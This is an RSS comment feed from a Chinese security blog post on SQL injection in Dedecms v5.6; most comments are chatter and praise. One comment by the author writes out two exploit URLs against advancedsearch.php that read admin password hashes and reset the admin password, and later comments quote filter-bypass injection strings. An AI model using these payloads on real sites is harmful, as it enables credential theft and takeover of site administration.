<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="Magike 1.2.0 Release" -->
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Dedecms v5.6的鸡肋注入的可行性分析]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/</link>
<description>Looking for change</description>
<language>zh-cn-utf8</language>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Magike 1.2.0 Release</generator>
<webMaster>oldjun</webMaster><item>
<title><![CDATA[web5he11]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-711</link>
<author>><![CDATA[web5he11]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-711</guid>
<pubDate>Thu, 10 Jun 2010 18:46:33 +0800</pubDate>
<description><![CDATA[oldjun果然是大牛啊。

不过第一楼的那个php的循环，估计会超时，或者运行死掉。不知道有没有更好的方法啊。（不用脚本，用其他的语言，多线程？？）

后面的那个绕过的方法太绝了。佩服佩服。]]></description>
<content:encoded><![CDATA[<p>oldjun果然是大牛啊。</p><p>不过第一楼的那个php的循环，估计会超时，或者运行死掉。不知道有没有更好的方法啊。（不用脚本，用其他的语言，多线程？？）</p><p>后面的那个绕过的方法太绝了。佩服佩服。</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[秒杀]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-712</link>
<author>><![CDATA[秒杀]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-712</guid>
<pubDate>Sat, 12 Jun 2010 18:03:18 +0800</pubDate>
<description><![CDATA[直接就是是可以遍目录吧...目录下面没有index]]></description>
<content:encoded><![CDATA[<p>直接就是是可以遍目录吧...目录下面没有index</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dedecms v5.6的鸡肋注入的可行性分析 | 神刀网]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-713</link>
<author>><![CDATA[Dedecms v5.6的鸡肋注入的可行性分析 | 神刀网]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-713</guid>
<pubDate>Mon, 14 Jun 2010 14:00:39 +0800</pubDate>
<description><![CDATA[[...][...]]]></description>
<content:encoded><![CDATA[<p>[...][...]</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-714</link>
<author>><![CDATA[oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-714</guid>
<pubDate>Tue, 15 Jun 2010 23:44:38 +0800</pubDate>
<description><![CDATA[http://www.t00ls.net/thread-8448-1-1.html

dede的SQL语句执行漏洞了！

前提先开启一个自定义搜索模型（一般情况下，不开的~）：

获取密码：
http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=SELECT%20pwd%20as%20aid%20FROM%20`%23@__admin`

重置密码：
http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=/**/update%20`%23@__admin`%20set%20pwd=0x6632393761353761356137343338393461306534/*]]></description>
<content:encoded><![CDATA[<p>http://www.t00ls.net/thread-8448-1-1.html<br /><br />dede的SQL语句执行漏洞了！<br /><br />前提先开启一个自定义搜索模型（一般情况下，不开的~）：<br /><br />获取密码：<br />http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=SELECT%20pwd%20as%20aid%20FROM%20`%23@__admin`<br /><br />重置密码：<br />http://127.0.0.1/plus/advancedsearch.php?mid=-1&sql=/**/update%20`%23@__admin`%20set%20pwd=0x6632393761353761356137343338393461306534/*</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[jannock]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-721</link>
<author>><![CDATA[jannock]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-721</guid>
<pubDate>Sun, 27 Jun 2010 02:12:46 +0800</pubDate>
<description><![CDATA[这个最后的SQL注入也差点被你发现了。继续读读代码，是存在注入的。而且结合其他因素还可以直接拿Shell]]></description>
<content:encoded><![CDATA[<p>这个最后的SQL注入也差点被你发现了。继续读读代码，是存在注入的。而且结合其他因素还可以直接拿Shell</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ppg]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-724</link>
<author>><![CDATA[ppg]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-724</guid>
<pubDate>Mon, 28 Jun 2010 05:43:06 +0800</pubDate>
<description><![CDATA[dedecms的注入，还没有试过呢]]></description>
<content:encoded><![CDATA[<p>dedecms的注入，还没有试过呢</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[常笑鹰]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-730</link>
<author>><![CDATA[常笑鹰]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-730</guid>
<pubDate>Thu, 01 Jul 2010 08:00:45 +0800</pubDate>
<description><![CDATA[我哭啊``《黑客脚本全本》昨天代理商刚退回给 《黑客手册》卖书的````
&nbsp;&nbsp;原来需要40块一本``&nbsp;&nbsp;在代理商那只要 32块。。。
&nbsp;&nbsp;&nbsp;&nbsp;好不容易凑到钱，一问老板，书刚退，欲哭无泪````
&nbsp;&nbsp; 还有，终于放假了，去申请Tools的会员了``]]></description>
<content:encoded><![CDATA[<p>我哭啊``《黑客脚本全本》昨天代理商刚退回给 《黑客手册》卖书的````<br />&nbsp;&nbsp;原来需要40块一本``&nbsp;&nbsp;在代理商那只要 32块。。。<br />&nbsp;&nbsp;&nbsp;&nbsp;好不容易凑到钱，一问老板，书刚退，欲哭无泪````<br />&nbsp;&nbsp; 还有，终于放假了，去申请Tools的会员了``</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[黑客帝国]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-753</link>
<author>><![CDATA[黑客帝国]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-753</guid>
<pubDate>Sat, 10 Jul 2010 03:21:49 +0800</pubDate>
<description><![CDATA[书是买了，但是蛋定不下来。]]></description>
<content:encoded><![CDATA[<p>书是买了，但是蛋定不下来。</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[匿名]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-812</link>
<author>><![CDATA[匿名]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-812</guid>
<pubDate>Wed, 11 Aug 2010 17:58:01 +0800</pubDate>
<description><![CDATA[MysqlIds 过滤了 &#39;/*&#39;&nbsp;&nbsp;

/**/UPDATE `dede_plus` set filelist = /*&#39;*/ (select &#39;1&#39;) WHERE `aid` =27&nbsp;&nbsp;

你的这个语句前后都有&#39;/*&#39; 我不懂你的意思]]></description>
<content:encoded><![CDATA[<p>MysqlIds 过滤了 &#39;/*&#39;&nbsp;&nbsp;<br /><br />/**/UPDATE `dede_plus` set filelist = /*&#39;*/ (select &#39;1&#39;) WHERE `aid` =27&nbsp;&nbsp;<br /><br />你的这个语句前后都有&#39;/*&#39; 我不懂你的意思</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[匿名]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/66/#comment-813</link>
<author>><![CDATA[匿名]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/66/#comment-813</guid>
<pubDate>Wed, 11 Aug 2010 18:00:34 +0800</pubDate>
<description><![CDATA[UPDATE `dede_plus` set filelist = &#39;\\&#39; and filelist =&#39;aaa&#39; and (select &#39;1&#39;) WHERE `aid` =27

这个语句&nbsp;&nbsp;MysqlIds 过滤了 select

我不知道这个是怎么运行的]]></description>
<content:encoded><![CDATA[<p>UPDATE `dede_plus` set filelist = &#39;\\&#39; and filelist =&#39;aaa&#39; and (select &#39;1&#39;) WHERE `aid` =27<br /><br />这个语句&nbsp;&nbsp;MysqlIds 过滤了 select<br /><br />我不知道这个是怎么运行的</p>]]></content:encoded>
</item>
</channel>
</rss>
